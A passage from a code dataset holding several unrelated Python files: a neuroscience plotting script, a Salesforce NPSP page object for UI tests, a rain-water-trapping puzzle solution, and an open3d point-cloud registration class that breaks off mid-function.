(mtime[0,:]<.3) ))[0]\n\nmat = matrix[:,valid,:][:,:,valid]\nmt\t = mtime[:,valid]\n\ncut1 = np.where((mt[1,:]==0))[0][-1]\ncut2 = np.where((mt[1,:]==2))[0][-1]\n\nstim = np.where((mt[0,:]>0))[0][0]\ndelay = np.where((mt[0,:]>0.75))[0][0]\nresp = np.where((mt[0,:]<0) & (mt[1,:]==2))[0][-1]\nfix = np.where((mt[0,:]<-1.1) & (mt[1,:]==3))[0][-1]\nstim2 = np.where((mt[0,:]>0) & (mt[1,:]==3))[0][0]\n\nnsamps = mat.shape[1]\n\nc = ax2.imshow(np.mean(mat,0), aspect='auto', origin='lower', \n\tvmin=0, vmax=.1, cmap='plasma')\nax2.plot([cut1,cut1], [-.3,nsamps-.5], 'w-', lw=2)\nax2.plot([cut2,cut2], [-.3,nsamps-.5], 'w-', lw=2)\nax2.plot([-.3,nsamps-.5], [resp,resp], 'w--', lw=2)\nax2.plot([-.3,nsamps-.5], [delay,delay], 'w--', lw=2)\nax2.plot([-.3,nsamps-.5], [cut1,cut1], 'w-', lw=2)\nax2.plot([-.3,nsamps-.5], [cut2,cut2], 'w-', lw=2)\nax2.fill_between([nsamps-5.5,nsamps-.5],[5.5,5.5],[4,4], color='k')\nax2.text(nsamps-10, 3, '.5 s')\nax2.set_yticks([stim, resp, fix, stim2]); \nax2.set_yticklabels([r'$S_{n-1}$', r'$R_{n-1}$', r'$F_n$', r'$S_n$'], \n\trotation='vertical')\nax2.set_xticks([stim, resp, fix, stim2]); \nax2.set_xticklabels([r'$S_{n-1}$', r'$R_{n-1}$', r'$F_n$', r'$S_n$'])\nax2.set_xlabel('testing time')\nax2.set_ylabel('training time')\nax2.set_ylim()\nsns.despine(ax=ax2, left=True, bottom=True)\nplt.colorbar(mappable=c, ax=ax22, shrink=2, ticks=[0,.1], \n\tlabel='decoding strength (a.u.)')\nsns.despine(ax=ax22, left=True, bottom=True)\nax22.set_xticks([]); ax22.set_yticks([]); \n\n\n##############################################################################\n#\t\t\t\t\t\t\t\tPLOT SERIAL BIAS\t \t\t\t \t #\n##############################################################################\n\nax1.plot(xxx, np.nanmean(serial,0), color='k')\nax1.fill_between(xxx, np.mean(serial,0) + sps.sem(serial,0), \n\tnp.nanmean(serial,0) - sps.sem(serial,0), color='grey', alpha=.25)\nsig_bar(ax1,np.where(sigpos)[0],xxx,[.97,1], 'k')\nsig_bar(ax1,np.where(signeg)[0],xxx,[.97,1], 'k')\nax1.plot(xxx, np.zeros(len(xxx)),'k--', alpha=.3)\nax1.set_ylim([-.5,1])\nax1.set_xlim([0,120])\nax1.set_ylabel(r'error in current trial $\\theta^{\\prime}_{e}$ ($^\\circ$)')\nax1.set_yticks([-.5,0,.5,1])\nax1.set_xticks([0,60,120]); ax1.set_xticklabels([30,90,150])\nax1.set_xlabel('relative location of\\n previous trial ' + r'$\\theta_{d}$ ($^\\circ$)')\nax1.get_yaxis().set_tick_params(direction='in')\nax1.get_xaxis().set_tick_params(direction='in')\nsns.despine(ax=ax1)\n\nplt.show()\n","repo_name":"comptelab/interplayPFC","sub_path":"Fig2/plot_fig2.py","file_name":"plot_fig2.py","file_ext":"py","file_size_in_byte":11880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3729973810","text":"from cumulusci.robotframework.pageobjects import ListingPage\nfrom cumulusci.robotframework.pageobjects import DetailPage\nfrom cumulusci.robotframework.pageobjects import pageobject\nfrom cumulusci.robotframework.utils import capture_screenshot_on_error\nfrom BaseObjects import BaseNPSPPage\nfrom NPSP import npsp_lex_locators\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\n@pageobject(\"Listing\", \"npe03__Recurring_Donation__c\")\nclass RDListingPage(BaseNPSPPage, ListingPage):\n object_name = \"npe03__Recurring_Donation__c\"\n\n\n\n@pageobject(\"Details\", \"npe03__Recurring_Donation__c\")\nclass RDDetailPage(BaseNPSPPage,DetailPage ):\n object_name = \"npe03__Recurring_Donation__c\"\n \n def _is_current_page(self):\n \"\"\" Verify we are on the Account detail page\n by verifying that the url contains '/view'\n \"\"\"\n self.selenium.wait_until_location_contains(\"/view\", timeout=60, message=\"Record view did not open in 1 min\")\n self.selenium.location_should_contain(\"/lightning/r/npe03__Recurring_Donation__c/\",message=\"Current page is not a Recurring Donations record view\")\n \n def refresh_opportunities(self):\n \"\"\"Clicks on more actions dropdown and click the given title\"\"\"\n locator=npsp_lex_locators['link-contains'].format(\"more actions\")\n self.selenium.click_element(locator)\n self.selenium.wait_until_page_contains(\"Refresh Opportunities\")\n link_locator=npsp_lex_locators['link'].format('Refresh_Opportunities','Refresh_Opportunities')\n \n def click_actions_button(self,button_name):\n \"\"\"Clicks on action button based on API version\"\"\"\n if self.npsp.latest_api_version == 47.0:\n self.selenium.click_link(button_name)\n else:\n self.selenium.click_button(button_name)\n \n @capture_screenshot_on_error\n def validate_field_values_under_section(self, section=None, **kwargs):\n \"\"\"Based on the section name , navigates to the sections and validates the key. value pair values passed in kwargs.\n If the section is current schedule, waits for the Current schedule section card on the side bar\n Validates the display fields in the card match with the values passed in the key value pair\"\"\"\n \n if section == \"Current Schedule\":\n active_schedule_card = npsp_lex_locators[\"erd\"][\"active_schedules_card\"].format(section)\n number_fields = ['Amount','Installment Frequency']\n date_fields = ['Effective Date']\n self.selenium.wait_until_element_is_visible(active_schedule_card,60)\n for label, value in kwargs.items():\n if label in number_fields:\n locator = npsp_lex_locators[\"erd\"][\"formatted_number\"].format(label)\n actual_value=self.selenium.get_webelement(locator).text\n elif label in date_fields:\n locator = npsp_lex_locators[\"erd\"][\"formatted_date\"].format(label)\n actual_value=self.selenium.get_webelement(locator).text\n else:\n locator = npsp_lex_locators[\"erd\"][\"formatted_text\"].format(label)\n actual_value=self.selenium.get_webelement(locator).text\n \n if self.npsp.check_if_element_exists(locator):\n print(f\"element exists {locator}\")\n actual_value=self.selenium.get_webelement(locator).text\n print(f\"actual value is {actual_value}\")\n self.builtin.log(f\"actual value is {actual_value}\")\n assert value == actual_value, \"Expected {} value to be {} but found {}\".format(label,value, actual_value)\n else:\n self.builtin.log(\"element Not found\")\n else:\n for label, value in kwargs.items():\n self.npsp.navigate_to_and_validate_field_value(label, \"contains\", value, section)\n \n \n \n @capture_screenshot_on_error\n def validate_upcoming_schedules(self, num_payments,startdate,dayofmonth):\n \"\"\"Takes in the parameter (number of payments) and the donation start date\n verifies that the payment schedules created on UI reflect the total number\n verifies that the next payment dates are reflected correctly for all the schedules\"\"\"\n \n installmentrow = npsp_lex_locators[\"erd\"][\"installment_row\"]\n installments = self.selenium.get_webelements(installmentrow)\n count = len(installments)\n print(f\"Number of installments created is {count}\")\n assert count == int(num_payments), \"Expected installments to be {} but found {}\".format(num_payments, count)\n if count == int(num_payments):\n i = 1\n while i < count:\n datefield = npsp_lex_locators[\"erd\"][\"installment_date\"].format(i)\n installment_date = self.selenium.get_webelement(datefield)\n date_object = datetime.strptime(startdate, '%m/%d/%Y').date()\n expected_date = (date_object+relativedelta(months=+i)).replace(day=int(dayofmonth))\n actual_date=self.selenium.get_webelement(installment_date).text\n formatted_actual = datetime.strptime(actual_date, '%m/%d/%Y').date()\n assert formatted_actual == expected_date, \"Expected date to be {} but found {}\".format(expected_date,formatted_actual)\n i=i+1","repo_name":"Clickfunne/NPSP","sub_path":"robot/Cumulus/resources/RecurringDonationsPageObject.py","file_name":"RecurringDonationsPageObject.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"37648468854","text":"# UBER\r\n\"\"\"\r\n SOLVED -- LEETCODE#42\r\n You have a landscape, in which puddles can form.\r\n You are given an array of non-negative integers representing the elevation at each location.\r\n Return the amount of water that would accumulate if it rains.\r\n\r\n For example: [0,1,0,2,1,0,1,3,2,1,2,1] should return 6 because 6 units of water can get trapped here.\r\n X \r\n X...XX.X \r\n X.XX.XXXXXX \r\n # [0,1,0,2,1,0,1,3,2,1,2,1]\r\n X reprecents the surface of the mountain any . represent clogged water\r\n\"\"\"\r\n\r\ndef capacity(arr):\r\n # Time: O(n) Space: O(n)\r\n n = len(arr)\r\n if n == 0: return 0\r\n leftHigh = [0 for _ in range(n)] \r\n rightHigh = [0 for _ in range(n)]\r\n \r\n leftHigh[0] = arr[0]\r\n for i in range(1, n):\r\n leftHigh[i] = max(leftHigh[i-1], arr[i])\r\n\r\n rightHigh[n-1] = arr[n-1]\r\n for i in range(n-2, -1, -1):\r\n rightHigh[i] = max(rightHigh[i+1], arr[i])\r\n\r\n sol = 0\r\n for i in range(n):\r\n sol += max(0, min(leftHigh[i], rightHigh[i]) - arr[i])\r\n\r\n return sol\r\n\r\nprint(capacity([0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]))\r\n# 6","repo_name":"SuchismitaDhal/Solutions-dailyInterviewPro","sub_path":"2019/09-September/09.04.py","file_name":"09.04.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26723515365","text":"from utils import colour_map, min_max_normalisation, mae\nfrom open3d import JVisualizer\nfrom xlrd import XLRDError\nfrom sklearn import neighbors\n\nimport pandas as pd\nimport numpy as np\nimport open3d as o3d\nimport copy\nimport matplotlib.pyplot as plt\nimport tifffile.tifffile as tiff\n\n\nclass RegistrationObj():\n \n def __init__(self, pos_path_source, pos_path_target, color_path_source, color_path_target, \n algorithm, **kwargs):\n self.pos_path_source= pos_path_source\n self.source_pcd = o3d.geometry.PointCloud()\n self.pos_path_target= pos_path_target\n self.target_pcd = o3d.geometry.PointCloud()\n self.color_path_source= color_path_source\n self.source_color = None\n self.norm_source_color = None\n self.color_path_target= color_path_target\n self.target_color = None\n self.norm_target_color = None\n self.algorithm = algorithm\n assert (self.algorithm=='colored_icp'or self.algorithm=='icp' or self.algorithm=='ransac'), 'Invalid algorithm specified. Choose from: \\n ransac -> runs only RANSAC global registration \\n icp -> runs RANSAC and then local ICP registration \\n colored_icp -> runs RANSAC and then local colored ICP registration'\n self.preprocessing = False\n self.result = None\n self.registration_result = o3d.pipelines.registration.RegistrationResult()\n self.mae = None\n self.registered_color = None\n self.registered_target = None\n self.mode = \"knn\"\n self.method = \"Median\"\n self.other_registered_channels = []\n self.manual_corr_map = None #To insert corr map obtained from GA. Will override corr_map from registration result\n \n \n \"\"\"Setting the arguments for create_pcd\"\"\"\n self.pos_skiprows = None\n self.pos_usecols = None\n self.pos_header = 0\n self.color_skiprows = None\n self.color_usecols = None\n self.color_header = 0\n \n self.__dict__.update(kwargs)\n\n \"\"\" Setting the values of registration parameters\"\"\"\n self.voxel_size = kwargs.get('voxel_size', 10)\n self.downsampling = kwargs.get('downsampling', False)\n self.norm_radius_modifier = kwargs.get('norm_radius_modifier', 2)\n self.norm_maxnn = kwargs.get('norm_maxnn', 30)\n self.fpfh_radius_modifier = kwargs.get('fpfh_radius_modifier', 5)\n self.fpfh_maxnn = kwargs.get('fpfh_maxnn', 100)\n self.ransac_dist_modifier = kwargs.get('ransac_dist_modifier', 1.5)\n self.ransac_edge_length = kwargs.get('ransac_edge_length', 0.9)\n self.ransac_mutual_filter = kwargs.get('ransac_mutual_filter', True)\n self.icp_dist_check = kwargs.get('icp_dist_check', 1)\n self.coloredICP_maxnn = kwargs.get('coloredICP_maxnn', 50)\n self.other_source_channels = kwargs.get('other_source_channels', [])\n self.other_target_channels = kwargs.get('other_target_channels', []) \n self.n_neighbors = kwargs.get('n_neighbors', 5)\n self.weights = kwargs.get('weights', \"distance\")\n \n def __str__(self):\n try:\n string = \"\"\"--- Registration Object--- \\nAlgorithm used = {0} \\nPreprocessing performed = {1} \\nRegistration performed = {2} \n \\nFitness = {3:.2f} \\nInlier RMSE = {4:.2f} \\nScaled inlier RMSE = {5:.2f} \\nMAE = {6:.2f} \n \\nRegistered color = {7}\"\"\". format(self.algorithm, self.preprocessing, \n self.result, \n self.registration_result.fitness,\n self.registration_result.inlier_rmse, \n (self.registration_result.inlier_rmse/self.registration_result.fitness),\n self.mae, self.registered_color)\n return string\n \n except ZeroDivisionError:\n \"\"\" Occurs if registration hasn't been performed as scaled_inlier_rmse divides by zero fitness\"\"\"\n \n string = \"\"\"--- Registration Object--- \\nAlgorithm used = {0} \\nPreprocessing performed = {1} \\nRegistration performed = {2}\"\"\" .format(self.algorithm, self.preprocessing, self.result) \n return string\n \n def __repr__(self):\n return self.__str__()\n\n def preprocessing_status_update(self):\n self.preprocessing = True\n \n def result_status_update(self):\n self.result = True\n \n def registration_result_update(self, registration_result):\n self.registration_result = registration_result\n \n def update_source_color(self, source_color):\n self.source_color = source_color\n \n def update_norm_source_color(self, norm_source_color):\n self.norm_source_color = norm_source_color\n \n def update_target_color(self, target_color):\n self.target_color = target_color\n \n def update_norm_target_color(self, norm_target_color):\n self.norm_target_color = norm_target_color\n \n def update_source_pcd(self, source_pcd):\n self.source_pcd = source_pcd\n \n def update_target_pcd(self, target_pcd):\n self.target_pcd = target_pcd\n \n def update_mae(self, mae):\n self.mae = mae\n \n def update_registered_color(self, registered_color):\n self.registered_color = registered_color\n \n def update_registered_target(self, registered_target):\n self.registered_target = registered_target \n \n def update_other_registered_channels(self, other_registered_channels):\n self.other_registered_channels = other_registered_channels \n\n def create_pcd(self, print_filenames = False):\n \"\"\" Converts excel (.xls or .csv) files containing xyz coordinates into geometry.PointCloud object. \n Returns the filenames as a list if return_filenames=True. \"\"\"\n\n filenames = []\n \n \"\"\" Handling .xls files\"\"\"\n try: \n source_df = pd.read_excel(self.pos_path_source, skiprows = self.pos_skiprows, usecols = self.pos_usecols, header = self.pos_header)\n target_df = pd.read_excel(self.pos_path_target, skiprows = self.pos_skiprows, usecols = self.pos_usecols, header = self.pos_header)\n source_color_df = pd.read_excel(self.color_path_source, skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n target_color_df = pd.read_excel(self.color_path_target, skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header) \n \n source_pcd = o3d.geometry.PointCloud() \n source_np = np.asarray(source_df)\n assert (len(source_np.shape)==2 and source_np.shape[1]==3), 'Source points file has incorrect dimensions. \\n Source points file must be a 2-dimensional array with \"n\" rows and 3 columns'\n assert (source_np.dtype=='float64'), 'Source points contain non-float values. \\n This could mean column headings have been read incorrectly from file. Try altering pos_skiprows, pos_header, pos_usecols attributes.'\n \n source_color = np.asarray(source_color_df)\n assert (len(source_color.shape)==2 and source_color.shape[1]==1), 'Source colors file has incorrect dimensions. \\n Source colors file must be a 2-dimensional array with \"n\" rows and 1 column'\n assert (source_color.dtype=='float64'), 'Source colors contain non-float values. \\n This could mean column headings have been read incorrectly from file. Try altering color_skiprows, color_header, color_usecols attributes.'\n self.update_source_color(source_color)\n norm_colors_source = min_max_normalisation(source_color)\n self.update_norm_source_color(norm_colors_source)\n \n source_rgb, _ = colour_map(source_color,\"viridis\")\n source_pcd.points=o3d.utility.Vector3dVector(source_np)\n source_pcd.colors=o3d.utility.Vector3dVector(source_rgb)\n o3d.io.write_point_cloud(self.pos_path_source.split('.xls')[0] + '.pcd', source_pcd)\n self.update_source_pcd(source_pcd)\n filenames.append(self.pos_path_source.split('.xls')[0] + '.pcd')\n \n target_pcd = o3d.geometry.PointCloud() \n target_np = np.asarray(target_df)\n assert (len(target_np.shape)==2 and target_np.shape[1]==3), 'Target points file has incorrect dimensions. \\n Target points file must be a 2-dimensional array with \"n\" rows and 3 columns'\n assert (target_np.dtype=='float64'), 'Target points contain non-float values. \\n This could mean column headings have been read incorrectly from file. Try altering pos_skiprows, pos_header attributes.'\n \n target_color = np.asarray(target_color_df)\n assert (len(target_color.shape)==2 and target_color.shape[1]==1), 'Target colors file has incorrect dimensions. \\n Target colors file must be a 2-dimensional array with \"n\" rows and 1 column'\n assert (target_color.dtype=='float64'), 'Target colors contain non-float values. \\n This could mean column headings have been read incorrectly from file. Try altering color_skiprows, color_header, color_usecols attributes.'\n norm_colors_target = min_max_normalisation(target_color)\n self.update_target_color(target_color)\n self.update_norm_target_color(norm_colors_target)\n \n target_rgb, _ = colour_map(target_color,\"viridis\")\n target_pcd.points=o3d.utility.Vector3dVector(target_np)\n target_pcd.colors=o3d.utility.Vector3dVector(target_rgb)\n o3d.io.write_point_cloud(self.pos_path_target.split('.xls')[0] + '.pcd', target_pcd)\n self.update_target_pcd(target_pcd)\n filenames.append(self.pos_path_target.split('.xls')[0] + '.pcd')\n \n return source_pcd, target_pcd\n\n except XLRDError:\n \n \"\"\" Handling .csv files\"\"\"\n try:\n source_df = pd.read_csv(self.pos_path_source, skiprows = self.pos_skiprows, usecols = self.pos_usecols, header = self.pos_header)\n target_df = pd.read_csv(self.pos_path_target, skiprows = self.pos_skiprows, usecols = self.pos_usecols, header = self.pos_header)\n source_color_df = pd.read_csv(self.color_path_source, skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n target_color_df = pd.read_csv(self.color_path_target, skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n\n source_pcd = o3d.geometry.PointCloud() \n source_np = np.asarray(source_df)\n assert (len(source_np.shape)==2 and source_np.shape[1]==3), 'Source points file has incorrect dimensions. \\n Source points file must be a 2-dimensional array with \"n\" rows and 3 columns'\n assert (source_np.dtype=='float64' or source_np.dtype == 'int64'), 'Source points contain non-float or int values. \\n This could mean column headings have been read incorrectly from file. Try altering pos_skiprows, pos_header, pos_usecols attributes.'\n \n source_color = np.asarray(source_color_df)\n assert (len(source_color.shape)==2 and source_color.shape[1]==1), 'Source colors file has incorrect dimensions. \\n Source colors file must be a 2-dimensional array with \"n\" rows and 1 column'\n assert (source_color.dtype=='float64' or source_color.dtype == 'int64'), 'Source colors contain non-float or int values. \\n This could mean column headings have been read incorrectly from file. Try altering color_skiprows, color_header, color_usecols attributes.'\n \n norm_colors_source = min_max_normalisation(source_color)\n self.update_source_color(source_color)\n self.update_norm_source_color(norm_colors_source)\n \n source_rgb, _ = colour_map(source_color,\"viridis\")\n source_pcd.points=o3d.utility.Vector3dVector(source_np)\n source_pcd.colors=o3d.utility.Vector3dVector(source_rgb)\n o3d.io.write_point_cloud(self.pos_path_source.split('csv')[0] + '.pcd', source_pcd)\n self.update_source_pcd(source_pcd)\n filenames.append(self.pos_path_source.split('.csv')[0] + '.pcd')\n\n target_pcd = o3d.geometry.PointCloud() \n target_np = np.asarray(target_df)\n assert (len(target_np.shape)==2 and target_np.shape[1]==3), 'Target points file has incorrect dimensions. \\n Target points file must be a 2-dimensional array with \"n\" rows and 3 columns'\n assert (target_np.dtype=='float64' or target_np.dtype == \"int64\"), 'Target points contain non-float or int values. \\n This could mean column headings have been read incorrectly from file. Try altering pos_skiprows, pos_header attributes.'\n \n target_color = np.asarray(target_color_df)\n assert (len(target_color.shape)==2 and target_color.shape[1]==1), 'Target colors file has incorrect dimensions. \\n Target colors file must be a 2-dimensional array with \"n\" rows and 1 column'\n assert (target_color.dtype=='float64' or target_np.dtype == \"int64\"), 'Target colors contain non-float or int values. \\n This could mean column headings have been read incorrectly from file. Try altering color_skiprows, color_header, color_usecols attributes.'\n norm_colors_target = min_max_normalisation(target_color)\n self.update_target_color(target_color)\n self.update_norm_target_color(norm_colors_target)\n \n target_rgb, _ = colour_map(target_color,\"viridis\")\n target_pcd.points=o3d.utility.Vector3dVector(target_np)\n target_pcd.colors=o3d.utility.Vector3dVector(target_rgb)\n o3d.io.write_point_cloud(self.pos_path_target.split('.csv')[0] + '.pcd', target_pcd)\n self.update_target_pcd(target_pcd)\n filenames.append(self.pos_path_target.split('.csv')[0] + '.pcd')\n \n return source_pcd, target_pcd\n\n except ValueError as v:\n \n print(\"Input excel files should be of extension .xls or .csv, with UTF-8 encoding. Please convert both files to either one of these formats.\")\n print(v)\n \n finally:\n if print_filenames:\n print (filenames)\n \n \n def preprocessing_func(self, verbose = True):\n \n \"\"\" Down sample the point cloud, estimate normals, then compute a FPFH feature for each point. \n Returns the processed PointCloud object and an open3d.registration.Feature class object.\"\"\"\n\n source_pcd, target_pcd = self.create_pcd() \n\n if self.downsampling:\n source_processed = source_pcd.voxel_down_sample(self.voxel_size)\n target_processed = target_pcd.voxel_down_sample(self.voxel_size)\n\n if verbose:\n print(f\":: Downsample with a voxel size {voxel_size}\")\n else:\n source_processed = source_pcd\n target_processed = target_pcd\n\n if verbose:\n print(\":: Point Cloud was not downsampled\")\n\n radius_normal = self.voxel_size * self.norm_radius_modifier\n radius_feature = self.voxel_size * self.fpfh_radius_modifier\n\n if verbose:\n print(f\":: Estimate normal with search radius {radius_normal}.\")\n print(f\":: Compute FPFH feature with search radius {radius_feature}.\\n---------------------------------------\")\n\n source_processed.estimate_normals(\n search_param = \n o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=self.norm_maxnn),\n fast_normal_computation = True)\n\n source_fpfh = o3d.pipelines.registration.compute_fpfh_feature(\n source_processed,\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=self.fpfh_maxnn))\n\n target_processed.estimate_normals(\n search_param = \n o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=self.norm_maxnn),\n fast_normal_computation = True)\n\n target_fpfh = o3d.pipelines.registration.compute_fpfh_feature(\n target_processed,\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=self.fpfh_maxnn))\n \n self.preprocessing_status_update()\n \n return source_processed, target_processed, source_fpfh, target_fpfh\n \n def global_ransac_registration(self, verbose = True):\n \"\"\" Implements the RANSAC registration based on feature matching and returns a registration.RegistrationResult object.\n\n Source: Adapted from open3d global registration documentation: http://www.open3d.org/docs/release/tutorial/pipelines/global_registration.html\n\n Parameters:\n ----------\n source_processed: geometry.PointCloud\n Source point cloud after downsampling (if downsample=True) and normal estimation\n target_processed: geometry.PointCloud\n Target point cloud after downsampling (if downsample=True) and normal estimation\n source_fpfh: registration.Feature\n Source point cloud fpfh information\n target_fpfh: registration.Feature\n Target point cloud fpfh information\n voxel_size: float, optional\n Multiplied with the ransac_dist_modifier to yield the distance threshold used by CorrespondenceCheckerBasedOnDistance\n ransac_dist_modifier:float, optional\n Multiplied with the voxel_size to yield the distance threshold used by CorrespondenceCheckerBasedOnDistance\n ransac_edge_length: float, optional\n Input to CorrespondenceCheckerBasedOnEdgeLength\n\n Return:\n ----------\n result: registration.RegistrationResult\n Result of RANSAC alignment\n \"\"\"\n\n distance_threshold = self.voxel_size * self.ransac_dist_modifier\n\n if verbose:\n print(\":: RANSAC registration on point clouds.\")\n print(\" Since the voxel size is %.3f,\" % self.voxel_size)\n print(\" we use a liberal distance threshold %.3f.\" % distance_threshold)\n \n source_processed, target_processed, source_fpfh, target_fpfh = self.preprocessing_func(verbose = verbose)\n\n result_ransac = o3d.pipelines.registration.registration_ransac_based_on_feature_matching(\n source_processed, target_processed, source_fpfh, target_fpfh, self.ransac_mutual_filter, distance_threshold,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(False), 4, [\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnEdgeLength(self.ransac_edge_length),\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnDistance(\n distance_threshold)\n ], o3d.pipelines.registration.RANSACConvergenceCriteria(4000000, 500))\n \n self.registration_result_update(result_ransac)\n self.result_status_update()\n self.calculate_mae()\n \n return result_ransac\n \n def icp_registration(self, verbose = True): \n \"\"\" Implements the Point-to-Plane ICP registration algorithm and returns a registration.RegistrationResult object.\n \"\"\"\n\n ransac_transform = self.global_ransac_registration(verbose = verbose)\n \n source_processed, target_processed, source_fpfh, target_fpfh = self.preprocessing_func(verbose = verbose)\n\n distance_threshold = self.voxel_size * self.icp_dist_check\n\n result_icp = o3d.pipelines.registration.registration_icp(\n source_processed, target_processed, distance_threshold, ransac_transform.transformation,\n o3d.pipelines.registration.TransformationEstimationPointToPlane(),\n o3d.pipelines.registration.ICPConvergenceCriteria(max_iteration = 2000))\n \n\n self.registration_result_update(result_icp)\n self.result_status_update()\n self.calculate_mae()\n \n return result_icp\n\n\n def colored_icp(self, verbose = True):\n \"\"\" Implements the Colored ICP registration algorithm and returns a registration.RegistrationResult object.\n\n Source: Adapted from open3d ICP registration documentation:http://www.open3d.org/docs/release/tutorial/pipelines/colored_pointcloud_registration.html\n \"\"\"\n \n ransac_transform = self.global_ransac_registration(verbose = verbose)\n \n source_processed, target_processed, source_fpfh, target_fpfh = self.preprocessing_func(verbose = verbose)\n\n current_transformation = ransac_transform.transformation\n\n source_colorreg = copy.deepcopy(source_processed)\n target_colorreg = copy.deepcopy(target_processed)\n\n if self.downsampling:\n source_colorreg = source_colorreg.voxel_down_sample(self.voxel_size)\n target_colorreg = target_colorreg.voxel_down_sample(self.voxel_size)\n\n source_colorreg.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=self.voxel_size * 2, max_nn=self.coloredICP_maxnn))\n\n target_colorreg.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=self.voxel_size * 2, max_nn=self.coloredICP_maxnn))\n\n result_icp_colored = o3d.pipelines.registration.registration_colored_icp(\n source_colorreg, target_colorreg, self.voxel_size, current_transformation,\n o3d.pipelines.registration.TransformationEstimationForColoredICP(),\n o3d.pipelines.registration.ICPConvergenceCriteria(relative_fitness=1e-6,\n relative_rmse=1e-6,\n max_iteration=100))\n\n current_transformation = result_icp_colored.transformation\n \n self.registration_result_update(result_icp_colored)\n self.result_status_update()\n self.calculate_mae()\n\n return result_icp_colored\n \n def perform_registration(self, verbose = True):\n if self.algorithm == \"ransac\":\n return self.global_ransac_registration(verbose = verbose)\n \n elif self.algorithm == \"icp\":\n return self.icp_registration(verbose = verbose)\n\n elif self.algorithm == \"colored_icp\":\n return self.colored_icp(verbose = verbose)\n \n else:\n print(\"Only 'ransac', 'icp' and 'colored_icp' are available algorithms to choose from.\")\n return None\n \n def calculate_mae(self):\n \"\"\"Returns the mean absolute error between the source and target color intensity channels\n\n Parameters:\n ----------\n source_color: np.array\n Source color channel (raw) intensity values\n target_color: np.array\n Target color channel (raw) intensity values\n registration_result: registration.RegistrationResult\n Registration result of alignment\n\n Return:\n ---------\n mae: float\n Mean absolute error \n \"\"\"\n corr_result = np.array(self.registration_result.correspondence_set)\n source_indices = corr_result[:,0]\n target_indices = corr_result[:,1]\n source_color_norm = self.norm_source_color[source_indices]\n target_color_norm = self.norm_target_color[target_indices]\n \n self.update_mae(mae(source_color_norm, target_color_norm)[0])\n \n def obtain_registration_metrics(self):\n \"\"\" For a particular registration result, displays the fitness, inlier RMSE and MAE estimate. Also describes the correspondence \n map properties. \n\n Parameters:\n ----------\n target: geometry.PointCloud\n Target point cloud\n source_color: np.array\n Source color channel (raw) intensity values\n target_color: np.array\n Target color channel (raw) intensity values\n registration_result: registration.RegistrationResult\n Registration result of alignment\n \"\"\"\n\n print(\"--- Registration results --- \")\n print(f\"Fitness: {self.registration_result.fitness*100:.2f}%\")\n print(f\"Inlier RMSE: {self.registration_result.inlier_rmse:.2f}\")\n print(f\"MAE: {self.mae:.2f}\\n---------------------------------------\") \n\n corr_map = np.array(self.registration_result.correspondence_set)\n source_indices = corr_map[:,0]\n target_indices = corr_map[:,1]\n\n num_target = np.array(self.target_pcd.points).shape[0]\n target_range = np.arange(0, num_target)\n\n unmapped_targets =np.where(np.invert(np.in1d(target_range, target_indices)))[0]\n target_repeats = {i:list(target_indices).count(i) for i in target_indices if list(target_indices).count(i) > 1}\n unique_target_indices = [x for x in target_indices if x not in target_repeats]\n\n print(\"--- Correspondence map properties --- \")\n print(f\"{len(unmapped_targets)} ({(len(unmapped_targets)/ num_target)*100:.3f}%) unmapped targets.\")\n print(f\"{len(target_repeats)} ({(len(target_repeats)/ num_target)*100:.3f}%) targets that are mapped by multiple source points.\")\n print(f\"{len(unique_target_indices)} ({(len(unique_target_indices)/ num_target)*100:.3f}%) targets that are uniquely mapped by a single source point.\")\n\n if len(unmapped_targets) + len(target_repeats) + len(unique_target_indices) == len(self.target_pcd.points):\n print(f\"All {len(self.target_pcd.points)} target points are accounted for.\")\n \n def transform_source(self):\n transformation = self.registration_result.transformation\n source_transformed= copy.deepcopy(self.source_pcd)\n source_transformed.transform(transformation)\n return source_transformed\n\n def map_source2target(self, verbose = False):\n \"\"\" Returns the registered target point cloud, where the color intensity values of multiply mapped target points are imputed by\n a chosen averaging method. Currently, unmapped points in the target cloud retain their original intensities.\n\n Parameters:\n ----------\n source: geometry.PointCloud\n Source point cloud\n target: geometry.PointCloud\n Target point cloud\n source_color: np.array\n Source color channel intensity values\n target_color: np.array\n Target color channel intensity values\n registration_result: registration.RegistrationResult\n Registration result of alignment\n method: str\n A choice between \"mean\" or \"median\" averaging for imputing the intensity of multiply mapped target points\n verbose: boolean\n Prints the color numpy arrays before and after the mapping is performed.\n\n Return:\n --------\n target_new: geometry.PointCloud\n Updated target point cloud\n mapped_col_range: matplotlib.cm.ScalarMappable object \n color_list: np.array\n Updated color intensity array of the target\n\n \"\"\"\n if self.manual_corr_map :\n corr_map = self.manual_corr_map\n else:\n corr_map = np.array(self.registration_result.correspondence_set)\n \n source_indices = corr_map[:,0]\n target_indices = corr_map[:,1]\n \n target_new = copy.deepcopy(self.target_pcd)\n \n target_repeats = {i:list(target_indices).count(i) for i in target_indices if list(target_indices).count(i) > 1}\n unique_target_indices = [x for x in target_indices if x not in target_repeats]\n \n if self.mode == \"complete\":\n color_list = copy.deepcopy(self.target_color)\n \n elif self.mode == \"null\" or self.mode == \"knn\":\n color_list = np.zeros(shape=(self.target_color.shape))\n \n \n ### Dealing with all other color channels\n \n if self.other_source_channels:\n other_registered_channels = []\n \n for i in 